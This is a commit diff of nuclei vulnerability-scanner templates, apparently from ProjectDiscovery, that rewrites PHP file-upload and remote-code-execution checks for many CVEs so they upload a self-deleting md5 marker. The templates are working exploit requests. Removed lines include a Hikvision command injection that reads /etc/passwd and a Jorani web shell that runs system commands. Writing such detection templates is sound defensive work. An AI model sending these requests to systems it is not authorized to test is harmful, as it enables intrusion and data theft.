Merge pull request #9584 from projectdiscovery/php-updates

updated php fileupload templates
patch-1
Dhiyaneshwaran 2024-04-22 07:47:19 +05:30 committed by GitHub
commit 7ad7683446
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
36 changed files with 216 additions and 179 deletions

View File

@ -17,6 +17,9 @@ info:
max-request: 2 max-request: 2
tags: cnvd2021,cnvd,pan,micro,fileupload,intrusive tags: cnvd2021,cnvd,pan,micro,fileupload,intrusive
variables:
string: "{{randstr}}"
http: http:
- raw: - raw:
- | - |
@ -28,7 +31,7 @@ http:
Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.php" Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.php"
Content-Type: image/jpeg Content-Type: image/jpeg
<?php echo md5('CNVD-2021-49104');?> <?php echo md5("{{string}}");?>
--e64bdf16c554bbc109cecef6451c26a4-- --e64bdf16c554bbc109cecef6451c26a4--
- | - |
@ -37,6 +40,10 @@ http:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word
part: body
words:
- '{{md5(string)}}'
- type: word - type: word
part: body part: body
words: words:

View File

@ -30,6 +30,9 @@ info:
product: php product: php
tags: cve,cve2012,kev,vulhub,rce,php tags: cve,cve2012,kev,vulhub,rce,php
variables:
string: "CVE-2012-1823"
http: http:
- raw: - raw:
- | - |
@ -37,16 +40,13 @@ http:
Host: {{Hostname}} Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
<?php echo md5('CVE-2012-1823'); ?> <?php echo md5("{{string}}");?>
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body part: body
words: words:
- "3d638155445bffb044eec401381ad784" - '{{md5(string)}}'
- type: status
status:
- 200
# digest: 4b0a0048304602210092b10c72cc1fee8c04f5162308500dd81d910b697076b941eca0df0f5f7b7b96022100c296adc6a0e2ad0ebf4759128a19fb25b155493104267eeaa81f3731eea84fb2:922c64590222798bb761d5b6d8e72950 # digest: 4b0a0048304602210092b10c72cc1fee8c04f5162308500dd81d910b697076b941eca0df0f5f7b7b96022100c296adc6a0e2ad0ebf4759128a19fb25b155493104267eeaa81f3731eea84fb2:922c64590222798bb761d5b6d8e72950

View File

@ -28,6 +28,9 @@ info:
shodan-query: http.title:"PhpCollab" shodan-query: http.title:"PhpCollab"
tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive tags: cve,cve2017,phpcollab,rce,fileupload,edb,intrusive
variables:
string: "CVE-2017-6090"
http: http:
- raw: - raw:
- | - |
@ -39,7 +42,7 @@ http:
Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php" Content-Disposition: form-data; name="upload"; filename="{{randstr}}.php"
Content-Type: application/x-php Content-Type: application/x-php
<?php echo md5('phpcollab_rce');?> <?php echo md5("{{string}}");unlink(__FILE__);?>
-----------------------------154934846911423734231554128137-- -----------------------------154934846911423734231554128137--
- | - |
@ -49,9 +52,9 @@ http:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body part: body_2
words: words:
- "48dbd2384cb6b996fa1e2855c7f0567f" - '{{md5(string)}}'
- type: status - type: status
status: status:

View File

@ -27,6 +27,9 @@ info:
product: phpunit product: phpunit
tags: cve2017,cve,php,phpunit,rce,kev,phpunit_project tags: cve2017,cve,php,phpunit,rce,kev,phpunit_project
variables:
string: "CVE-2017-9841"
http: http:
- raw: - raw:
- | - |
@ -34,44 +37,44 @@ http:
Host: {{Hostname}} Host: {{Hostname}}
Content-Type: text/html Content-Type: text/html
<?php echo md5(phpunit_rce);?> <?php echo md5("{{string}}");?>
- | - |
GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Content-Type: text/html Content-Type: text/html
<?php echo md5(phpunit_rce);?> <?php echo md5("{{string}}");?>
- | - |
GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Content-Type: text/html Content-Type: text/html
<?php echo md5(phpunit_rce);?> <?php echo md5("{{string}}");?>
- | - |
GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Content-Type: text/html Content-Type: text/html
<?php echo md5(phpunit_rce);?> <?php echo md5("{{string}}");?>
- | - |
GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Content-Type: text/html Content-Type: text/html
<?php echo md5(phpunit_rce);?> <?php echo md5("{{string}}");?>
- | - |
GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
Content-Type: text/html Content-Type: text/html
<?php echo md5(phpunit_rce);?> <?php echo md5("{{string}}");?>
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body part: body
words: words:
- "6dd70f16549456495373a337e6708865" - '{{md5(string)}}'
- type: status - type: status
status: status:

View File

@ -29,6 +29,9 @@ info:
product: monitorr product: monitorr
tags: cve,cve2020,unauth,fileupload,monitor,edb,intrusive,packetstorm,rce,monitorr_project tags: cve,cve2020,unauth,fileupload,monitor,edb,intrusive,packetstorm,rce,monitorr_project
variables:
string: "CVE-2020-28871"
http: http:
- raw: - raw:
- | - |
@ -47,7 +50,7 @@ http:
Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php" Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php"
Content-Type: image/gif Content-Type: image/gif
GIF89a213213123<?php echo md5('CVE-2020-28871');unlink(__FILE__); ?> GIF89a213213123<?php echo md5("{{string}}");unlink(__FILE__);?>
-----------------------------31046105003900160576454225745-- -----------------------------31046105003900160576454225745--
- | - |
@ -59,7 +62,7 @@ http:
- type: word - type: word
part: body_2 part: body_2
words: words:
- "d03c180355b797069cc047ff5606d689" - '{{md5(string)}}'
- type: status - type: status
status: status:

View File

@ -30,6 +30,9 @@ info:
framework: wordpress framework: wordpress
tags: cve,cve2021,auth,wpscan,wordpress,wp-plugin,wp,modern-events-calendar-lite,rce,intrusive,webnus tags: cve,cve2021,auth,wpscan,wordpress,wp-plugin,wp,modern-events-calendar-lite,rce,intrusive,webnus
variables:
string: "CVE-2021-24145"
http: http:
- raw: - raw:
- | - |
@ -48,7 +51,7 @@ http:
Content-Disposition: form-data; name="feed"; filename="{{randstr}}.php" Content-Disposition: form-data; name="feed"; filename="{{randstr}}.php"
Content-Type: text/csv Content-Type: text/csv
<?php echo 'CVE-2021-24145'; ?> <?php echo md5("{{string}}");unlink(__FILE__);?>
-----------------------------132370916641787807752589698875 -----------------------------132370916641787807752589698875
Content-Disposition: form-data; name="mec-ix-action" Content-Disposition: form-data; name="mec-ix-action"
@ -61,10 +64,8 @@ http:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: dsl - type: word
dsl: part: body_3
- contains(header_3, "text/html") words:
- status_code_3 == 200 - '{{md5(string)}}'
- contains(body_3, 'CVE-2021-24145')
condition: and
# digest: 4b0a00483046022100a2bd2c8892466618dbe6b82f2a50a434408d50f09f53c604bad403b9e4edba02022100c35eb57fb6d3f1e2a67234e21bb4bc2c28dd4069d00727518ded026d6d633379:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100a2bd2c8892466618dbe6b82f2a50a434408d50f09f53c604bad403b9e4edba02022100c35eb57fb6d3f1e2a67234e21bb4bc2c28dd4069d00727518ded026d6d633379:922c64590222798bb761d5b6d8e72950

View File

@ -1,4 +1,4 @@
id: "CVE-2021-24236" id: CVE-2021-24236
info: info:
name: WordPress Imagements <=1.2.5 - Arbitrary File Upload name: WordPress Imagements <=1.2.5 - Arbitrary File Upload
@ -29,9 +29,11 @@ info:
product: imagements product: imagements
framework: wordpress framework: wordpress
tags: cve2021,cve,wp,unauth,imagements,wpscan,fileupload,wordpress,wp-plugin,intrusive,imagements_project tags: cve2021,cve,wp,unauth,imagements,wpscan,fileupload,wordpress,wp-plugin,intrusive,imagements_project
variables: variables:
php: "{{to_lower('{{randstr}}')}}.php" php: "{{to_lower('{{randstr}}')}}.php"
post: "1" post: "1"
string: "CVE-2021-24236"
http: http:
- raw: - raw:
@ -68,7 +70,7 @@ http:
Content-Disposition: form-data; name="image"; filename="{{php}}" Content-Disposition: form-data; name="image"; filename="{{php}}"
Content-Type: image/jpeg Content-Type: image/jpeg
<?php echo 'CVE-2021-24236'; ?> <?php echo md5("{{string}}");unlink(__FILE__);?>
------WebKitFormBoundaryIYl2Oz8ptq5OMtbU ------WebKitFormBoundaryIYl2Oz8ptq5OMtbU
Content-Disposition: form-data; name="submit" Content-Disposition: form-data; name="submit"
@ -91,5 +93,6 @@ http:
- type: word - type: word
part: body_2 part: body_2
words: words:
- "CVE-2021-24236" - '{{md5(string)}}'
# digest: 490a00463044022044c39b76c1670bd3821e888a59c2fcc7c2bebcfb2b62512c46e5d5106b91756302202d835016944e0d0c1b7eb6a83ff6a8fd8d13145e32dd2ad9b570e45291d08ea8:922c64590222798bb761d5b6d8e72950 # digest: 490a00463044022044c39b76c1670bd3821e888a59c2fcc7c2bebcfb2b62512c46e5d5106b91756302202d835016944e0d0c1b7eb6a83ff6a8fd8d13145e32dd2ad9b570e45291d08ea8:922c64590222798bb761d5b6d8e72950

View File

@ -31,10 +31,12 @@ info:
product: kaswara product: kaswara
framework: wordpress framework: wordpress
tags: cve2021,cve,intrusive,unauth,fileupload,wpscan,wordpress,wp-plugin,rce,wp,kaswara_project tags: cve2021,cve,intrusive,unauth,fileupload,wpscan,wordpress,wp-plugin,rce,wp,kaswara_project
variables: variables:
zip_file: "{{to_lower(rand_text_alpha(6))}}" zip_file: "{{to_lower(rand_text_alpha(6))}}"
php_file: "{{to_lower(rand_text_alpha(2))}}.php" php_file: "{{to_lower(rand_text_alpha(2))}}.php"
php_cmd: "<?php phpinfo();?>" string: "CVE-2021-24284"
php_cmd: "<?php echo md5('{{string}}');unlink(__FILE__);?>"
http: http:
- raw: - raw:
@ -71,7 +73,7 @@ http:
- type: word - type: word
part: body_2 part: body_2
words: words:
- "phpinfo()" - '{{md5(string)}}'
- type: status - type: status
status: status:

View File

@ -30,6 +30,9 @@ info:
framework: wordpress framework: wordpress
tags: cve,cve2021,wpscan,packetstorm,rce,workreap,wordpress,wp-plugin,intrusive,wp,amentotech tags: cve,cve2021,wpscan,packetstorm,rce,workreap,wordpress,wp-plugin,intrusive,wp,amentotech
variables:
string: "CVE-2021-24499"
http: http:
- raw: - raw:
- | - |
@ -46,7 +49,7 @@ http:
Content-Disposition: form-data; name="award_img"; filename="{{randstr}}.php" Content-Disposition: form-data; name="award_img"; filename="{{randstr}}.php"
Content-Type: application/x-httpd-php Content-Type: application/x-httpd-php
<?php echo md5("CVE-2021-24499"); ?> <?php echo md5("{{string}}");unlink(__FILE__);?>
-----------------------------cd0dc6bdc00b1cf9-- -----------------------------cd0dc6bdc00b1cf9--
- | - |
GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1 GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1
@ -57,7 +60,7 @@ http:
- type: word - type: word
part: body part: body
words: words:
- "71abe5077dae2754c36d731cc1534d4d" - '{{md5(string)}}'
- type: status - type: status
status: status:

View File

@ -30,6 +30,9 @@ info:
shodan-query: http.favicon.hash:999357577 shodan-query: http.favicon.hash:999357577
tags: cve2021,cve,hikvision,rce,iot,intrusive,kev tags: cve2021,cve,hikvision,rce,iot,intrusive,kev
variables:
string: "{{to_lower(rand_base(12))}}"
http: http:
- raw: - raw:
- | - |
@ -37,15 +40,15 @@ http:
Host: {{Hostname}} Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
<?xml version="1.0" encoding="UTF-8"?><language>$(cat /etc/passwd>webLib/x)</language> <?xml version="1.0" encoding="UTF-8"?><language>$(echo {{string}}>webLib/x)</language>
- | - |
GET /x HTTP/1.1 GET /x HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: word
part: body part: body_2
regex: words:
- "root:.*:0:0:" - "{{string}}"
# digest: 4a0a0047304502201b310c74c0ecade6660855e689efe3fa564362a2328cdf4ee738863363e0b7c7022100b519bac287cc3e8a6a3cd1187daf969b5f5baf0a2ec9be7adb3344e95561dfc2:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502201b310c74c0ecade6660855e689efe3fa564362a2328cdf4ee738863363e0b7c7022100b519bac287cc3e8a6a3cd1187daf969b5f5baf0a2ec9be7adb3344e95561dfc2:922c64590222798bb761d5b6d8e72950

View File

@ -29,6 +29,9 @@ info:
product: controller product: controller
tags: cve2021,cve,intrusive,packetstorm,rce,aviatrix,kev,fileupload tags: cve2021,cve,intrusive,packetstorm,rce,aviatrix,kev,fileupload
variables:
string: "CVE-2021-40870"
http: http:
- raw: - raw:
- | - |
@ -36,7 +39,7 @@ http:
Host: {{Hostname}} Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=<?php echo md5("CVE-2021-40870"); ?> CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{{randstr}}.php&data=<?php echo md5("{{string}}");unlink(__FILE__);?>
- | - |
GET /v1/{{randstr}}.php HTTP/1.1 GET /v1/{{randstr}}.php HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
@ -45,8 +48,9 @@ http:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body_2
words: words:
- '0d95513363fd69b9fee712f333293654' - '{{md5(string)}}'
- type: status - type: status
status: status:

View File

@ -32,6 +32,9 @@ info:
framework: wordpress framework: wordpress
tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive,syntactics tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive,syntactics
variables:
string: "CVE-2022-1952"
http: http:
- raw: - raw:
- | - |
@ -56,7 +59,7 @@ http:
Content-Disposition: form-data; name="driver_license_image2"; filename="{{randstr}}.php" Content-Disposition: form-data; name="driver_license_image2"; filename="{{randstr}}.php"
Content-Type: application/octet-stream Content-Type: application/octet-stream
<?php echo md5('CVE-2022-1952');?> <?php echo md5("{{string}}");unlink(__FILE__);?>
--------------------------98efee55508c5059-- --------------------------98efee55508c5059--
- | - |
@ -68,13 +71,10 @@ http:
Host: {{Hostname}} Host: {{Hostname}}
matchers: matchers:
- type: dsl - type: word
dsl: part: body_3
- contains(header_3, "text/html") words:
- status_code_3 == 200 - '{{md5(string)}}'
- contains(body_1, 'success\":true')
- contains(body_3, 'e0d7fcf2c9f63143b6278a3e40f6bea9')
condition: and
extractors: extractors:
- type: regex - type: regex

View File

@ -28,7 +28,10 @@ info:
max-request: 2 max-request: 2
vendor: thedigitalcraft vendor: thedigitalcraft
product: atomcms product: atomcms
tags: cve2022,cve,rce,atom,cms,unauth,packetstorm,intrusive,thedigitalcraft tags: cve2022,cve,rce,atom,cms,unauth,packetstorm,intrusive,thedigitalcraft,fielupload
variables:
string: "CVE-2022-25487"
http: http:
- raw: - raw:
@ -46,7 +49,7 @@ http:
Content-Type: image/jpeg Content-Type: image/jpeg
<?php echo md5('CVE-2022-25487');?> <?php echo md5("{{string}}");unlink(__FILE__);?>
-----------------------------30623082103363803402542706041-- -----------------------------30623082103363803402542706041--
- | - |
GET /uploads/{{filename}} HTTP/1.1 GET /uploads/{{filename}} HTTP/1.1
@ -57,16 +60,7 @@ http:
- type: word - type: word
part: body part: body
words: words:
- 7ee3686858eb89dd68ccf85f0ea03abe - '{{md5(string)}}'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
extractors: extractors:
- type: regex - type: regex

View File

@ -30,6 +30,9 @@ info:
framework: wordpress framework: wordpress
tags: cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated,intrusive,wpdevart tags: cve,cve2022,rce,wpscan,wordpress,wp-plugin,wp,booking-calendar,unauthenticated,intrusive,wpdevart
variables:
string: "CVE-2022-3982"
http: http:
- raw: - raw:
- | - |
@ -64,7 +67,7 @@ http:
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php" Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
Content-Type: application/octet-stream Content-Type: application/octet-stream
<?php echo md5("CVE-2022-3982"); ?> <?php echo md5("{{string}}");unlink(__FILE__);?>
--------------------------1cada150a8151a54-- --------------------------1cada150a8151a54--
- | - |
@ -72,12 +75,10 @@ http:
Host: {{Hostname}} Host: {{Hostname}}
matchers: matchers:
- type: dsl - type: word
dsl: part: body_3
- contains(header_3, "text/html") words:
- status_code_3 == 200 - '{{md5(string)}}'
- contains(body_3, 'e1bb1e04b786e90b07ebc4f7a2bff37d')
condition: and
extractors: extractors:
- type: regex - type: regex

View File

@ -25,7 +25,10 @@ info:
vendor: najeebmedia vendor: najeebmedia
product: woocommerce_checkout_field_manager product: woocommerce_checkout_field_manager
framework: wordpress framework: wordpress
tags: cve2022,cve,wp,n-media-woocommerce-checkout-fields,wpscan,rce,wordpress,wp-plugin,intrusive,najeebmedia tags: cve2022,cve,wp,n-media-woocommerce-checkout-fields,wpscan,rce,wordpress,wp-plugin,intrusive,najeebmedia,fileupload
variables:
string: "CVE-2022-4328"
http: http:
- raw: - raw:
@ -38,7 +41,7 @@ http:
Content-Disposition: form-data; name="file"; filename="{{randstr}}.php" Content-Disposition: form-data; name="file"; filename="{{randstr}}.php"
Content-Type: application/octet-stream Content-Type: application/octet-stream
<?php echo md5("CVE-2022-4328"); ?> <?php echo md5("{{string}}");unlink(__FILE__);?>
--------------------------22728be7b3104597-- --------------------------22728be7b3104597--
- | - |
@ -48,16 +51,8 @@ http:
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body part: body_2
words: words:
- fe5df26ce4ca0056ffae8854469c282f - '{{md5(string)}}'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4b0a00483046022100f22baef697a8a8d3b9cd970350ff7726ecc8317f7519fc4fc7986bc3b90deb640221009b219b5e2ad6ff59b71ad028d818ae581463c01d52d7f535c7efac3e81d60bc5:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100f22baef697a8a8d3b9cd970350ff7726ecc8317f7519fc4fc7986bc3b90deb640221009b219b5e2ad6ff59b71ad028d818ae581463c01d52d7f535c7efac3e81d60bc5:922c64590222798bb761d5b6d8e72950

View File

@ -31,9 +31,9 @@ info:
product: jorani product: jorani
shodan-query: http.favicon.hash:-2032163853 shodan-query: http.favicon.hash:-2032163853
tags: cve2023,cve,jorani,rce,packetstorm tags: cve2023,cve,jorani,rce,packetstorm
variables: variables:
cmd: "id" payload: "<?php if(isset($_SERVER['HTTP_{{header}}'])){echo md5('CVE-2023-26469');unlink(__FILE__);} ?>"
payload: "<?php if(isset($_SERVER['HTTP_{{header}}'])){system(base64_decode($_SERVER['HTTP_{{header}}']));} ?>"
header: "{{to_upper(rand_base(12))}}" header: "{{to_upper(rand_base(12))}}"
http: http:
@ -51,14 +51,14 @@ http:
GET /pages/view/log-{{date_time("%Y-%M-%D")}} HTTP/1.1 GET /pages/view/log-{{date_time("%Y-%M-%D")}} HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
X-REQUESTED-WITH: XMLHttpRequest X-REQUESTED-WITH: XMLHttpRequest
{{header}}: {{base64("echo ---------;{{cmd}} 2>&1;echo ---------;")}} {{header}}: CVE-2023-26469
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: regex - type: word
part: body_3 part: body
regex: words:
- 'uid=(\d+)\(.*?\) gid=(\d+)\(.*?\) groups=([\d,]+)\(.*?\)' - '7cca0844e81cd333152def045fe075c2'
- type: status - type: status
part: header_3 part: header_3

View File

@ -33,6 +33,7 @@ info:
tags: cve2023,cve,weaver,eoffice,ecology,fileupload,rce,intrusive tags: cve2023,cve,weaver,eoffice,ecology,fileupload,rce,intrusive
variables: variables:
file: '{{rand_base(5, "abc")}}' file: '{{rand_base(5, "abc")}}'
string: "CVE-2023-2648"
http: http:
- raw: - raw:
@ -46,7 +47,7 @@ http:
Content-Disposition: form-data; name="Filedata"; filename="{{file}}.php." Content-Disposition: form-data; name="Filedata"; filename="{{file}}.php."
Content-Type: image/jpeg Content-Type: image/jpeg
<?php echo md5('CVE-2023-2648');?> <?php echo md5("{{string}}");unlink(__FILE__);?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt ------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
- | - |
POST /attachment/{{name}}/{{file}}.php HTTP/1.1 POST /attachment/{{name}}/{{file}}.php HTTP/1.1
@ -57,7 +58,7 @@ http:
- type: word - type: word
part: body_2 part: body_2
words: words:
- "747711c62dffae7dbf726d8241bd07fe" - '{{md5(string)}}'
- type: status - type: status
part: body_2 part: body_2

View File

@ -30,8 +30,10 @@ info:
vendor: faculty_evaluation_system_project vendor: faculty_evaluation_system_project
product: faculty_evaluation_system product: faculty_evaluation_system
tags: cve2023,cve,packetstorm,faculty,rce,intrusive,faculty_evaluation_system_project tags: cve2023,cve,packetstorm,faculty,rce,intrusive,faculty_evaluation_system_project
variables: variables:
email: "{{randstr}}@{{rand_base(5)}}.com" email: "{{randstr}}@{{rand_base(5)}}.com"
string: "CVE-2023-33440"
http: http:
- raw: - raw:
@ -56,7 +58,7 @@ http:
Content-Disposition: form-data; name="img"; filename="{{randstr}}.php" Content-Disposition: form-data; name="img"; filename="{{randstr}}.php"
Content-Type: application/octet-stream Content-Type: application/octet-stream
<?php echo md5('CVE-2023-33440'); ?> <?php echo md5("{{string}}");unlink(__FILE__);?>
-----------------------------1037163726497 -----------------------------1037163726497
Content-Disposition: form-data; name="email" Content-Disposition: form-data; name="email"

View File

@ -30,11 +30,12 @@ info:
vendor: mgt-commerce vendor: mgt-commerce
product: cloudpanel product: cloudpanel
shodan-query: title:"Cloudpanel" shodan-query: title:"Cloudpanel"
tags: cve2023,cve,cloudpanel,rce,instrusive,mgt-commerce tags: cve2023,cve,cloudpanel,rce,intrusive,mgt-commerce,fileupload
variables: variables:
session: "ZGVmNTAyMDA3ZDI0OGNjZmU0NTVkMGQ2NmJhMjUxYjdhYzg0NzcyYzBmNjM0ODg0ODY0OWYyZTQ0MjgwZDVjZDBjNmY3MWJiZWU4ZTM4OTU4ZmE4YjViNjE4MGJiZjQ4NzA3MzcwNTJiNzFhM2JjYTBmNTdiODQ4ZDZjYjhiNmY1N2U3YTM1YWY3YjA3MTM1ZTlkYjViMjY5OTkzM2Q3NTAyOWI0ZGQ5ZDZmOTFhYTVlZTRhZjg0ZTBmZTU5NjY4NGI4OGU0NjVkNDU4MWYxOTc2MGNiMGI0ZGY2MmZjM2RkMmI4N2RhMzJkYTU4NjNjMWFmMGZlOWIwZjcyZGRkNmFhYzk3ZGVlZmY=" session: "ZGVmNTAyMDA3ZDI0OGNjZmU0NTVkMGQ2NmJhMjUxYjdhYzg0NzcyYzBmNjM0ODg0ODY0OWYyZTQ0MjgwZDVjZDBjNmY3MWJiZWU4ZTM4OTU4ZmE4YjViNjE4MGJiZjQ4NzA3MzcwNTJiNzFhM2JjYTBmNTdiODQ4ZDZjYjhiNmY1N2U3YTM1YWY3YjA3MTM1ZTlkYjViMjY5OTkzM2Q3NTAyOWI0ZGQ5ZDZmOTFhYTVlZTRhZjg0ZTBmZTU5NjY4NGI4OGU0NjVkNDU4MWYxOTc2MGNiMGI0ZGY2MmZjM2RkMmI4N2RhMzJkYTU4NjNjMWFmMGZlOWIwZjcyZGRkNmFhYzk3ZGVlZmY="
str1: "{{rand_base(10)}}" str1: "{{rand_base(10)}}"
str2: "{{randstr}}" string: "CVE-2023-35885"
http: http:
- raw: - raw:
@ -55,7 +56,7 @@ http:
Cookie: clp-fm={{session}} Cookie: clp-fm={{session}}
Content-Type: application/x-www-form-urlencoded Content-Type: application/x-www-form-urlencoded
id=/htdocs/app/files/public/{{str1}}.php&content=<?php echo "{{str2}}"; ?> id=/htdocs/app/files/public/{{str1}}.php&content=<?php echo md5("{{string}}");unlink(__FILE__);?>
- | - |
POST /file-manager/backend/permissions HTTP/1.1 POST /file-manager/backend/permissions HTTP/1.1
Host: {{Hostname}} Host: {{Hostname}}
@ -68,7 +69,8 @@ http:
Host: {{Hostname}} Host: {{Hostname}}
matchers: matchers:
- type: dsl - type: word
dsl: part: body_5
- body_5 == str2 words:
- '{{md5(string)}}'
# digest: 4a0a00473045022100a045e62170736a2a8aeec80f23c92eb2dfbb4704e093df2e6fa248efe9b5b13a02205561485b4abcd5c2e85f585adb82c3e1234a7a623a068b389b548de0887da802:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100a045e62170736a2a8aeec80f23c92eb2dfbb4704e093df2e6fa248efe9b5b13a02205561485b4abcd5c2e85f585adb82c3e1234a7a623a068b389b548de0887da802:922c64590222798bb761d5b6d8e72950

View File

@ -32,8 +32,8 @@ info:
shodan-query: title:"Juniper Web Device Manager" shodan-query: title:"Juniper Web Device Manager"
tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kev tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kev
variables: variables:
value: "CVE-2023-36844" string: "CVE-2023-36844"
payload: "('<?php echo md5('{{value}}');?>')" payload: "('<?php echo md5('{{string}}');unlink(__FILE__);?>')"
http: http:
- raw: - raw:
@ -65,7 +65,7 @@ http:
- type: word - type: word
part: body_3 part: body_3
words: words:
- '{{md5(value)}}' - '{{md5(string)}}'
extractors: extractors:
- type: regex - type: regex

View File

@ -28,6 +28,9 @@ info:
product: simple_online_piggery_management_system product: simple_online_piggery_management_system
tags: cve2023,cve,fileupload,rce,opms,intrusive,simple_online_piggery_management_system_project tags: cve2023,cve,fileupload,rce,opms,intrusive,simple_online_piggery_management_system_project
variables:
string: "CVE-2023-37629"
http: http:
- raw: - raw:
- | - |
@ -67,7 +70,7 @@ http:
Content-Disposition: form-data; name="pigphoto"; filename="{{rand_base(5)}}".php" Content-Disposition: form-data; name="pigphoto"; filename="{{rand_base(5)}}".php"
Content-Type: application/x-php Content-Type: application/x-php
<?php echo md5('CVE-2023-37629'); ?> <?php echo md5("{{string}}");unlink(__FILE__);?>
-----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP -----------------------------WebKitFormBoundary20kgW2hEKYaeF5iP
Content-Disposition: form-data; name="submit" Content-Disposition: form-data; name="submit"

View File

@ -29,6 +29,9 @@ info:
publicwww-query: /wp-content/plugins/Forminator publicwww-query: /wp-content/plugins/Forminator
tags: cve2023,cve,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce,incsub tags: cve2023,cve,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce,incsub
variables:
string: "CVE-2023-4596"
http: http:
- raw: - raw:
- | - |
@ -60,7 +63,7 @@ http:
Content-Disposition: form-data; name="postdata-1-post-image"; filename="{{randstr}}.php" Content-Disposition: form-data; name="postdata-1-post-image"; filename="{{randstr}}.php"
Content-Type: application/x-php Content-Type: application/x-php
<?php echo md5('CVE-2023-4596');?> <?php echo md5("{{string}}");unlink(__FILE__);?>
------WebKitFormBoundaryBLOYSueQAdgN2PRe ------WebKitFormBoundaryBLOYSueQAdgN2PRe
Content-Disposition: form-data; name="forminator_nonce" Content-Disposition: form-data; name="forminator_nonce"

View File

@ -29,8 +29,10 @@ info:
framework: wordpress framework: wordpress
publicwww-query: "/plugins/royal-elementor-addons/" publicwww-query: "/plugins/royal-elementor-addons/"
tags: wpscan,packetstorm,cve,cve2023,rce,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive tags: wpscan,packetstorm,cve,cve2023,rce,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive
variables: variables:
file: "{{to_lower(rand_text_alpha(5))}}" file: "{{to_lower(rand_text_alpha(5))}}"
string: "CVE-2023-5360"
http: http:
- raw: - raw:
@ -46,7 +48,7 @@ http:
Content-Disposition: form-data; name="uploaded_file"; filename="{{file}}.ph$p" Content-Disposition: form-data; name="uploaded_file"; filename="{{file}}.ph$p"
Content-Type: image/png Content-Type: image/png
<?php echo md5("CVE-2023-5360");?> <?php echo md5("{{string}}");unlink(__FILE__);?>
-----------------------------318949277012917151102295043236 -----------------------------318949277012917151102295043236
Content-Disposition: form-data; name="allowed_file_types" Content-Disposition: form-data; name="allowed_file_types"
@ -69,17 +71,7 @@ http:
- type: word - type: word
part: body_3 part: body_3
words: words:
- "86398d3a90432d24901a7bbdcf1ab2ba" - '{{md5(string)}}'
condition: and
- type: word
part: header_3
words:
- "text/html"
- type: status
status:
- 200
extractors: extractors:
- type: regex - type: regex

View File

@ -14,6 +14,8 @@ info:
metadata: metadata:
max-request: 2 max-request: 2
tags: rce,fileupload,intrusive,cloud,chuangtian tags: rce,fileupload,intrusive,cloud,chuangtian
variables:
string: "core-chuangtian-cloud-rce"
http: http:
- raw: - raw:
@ -29,17 +31,16 @@ http:
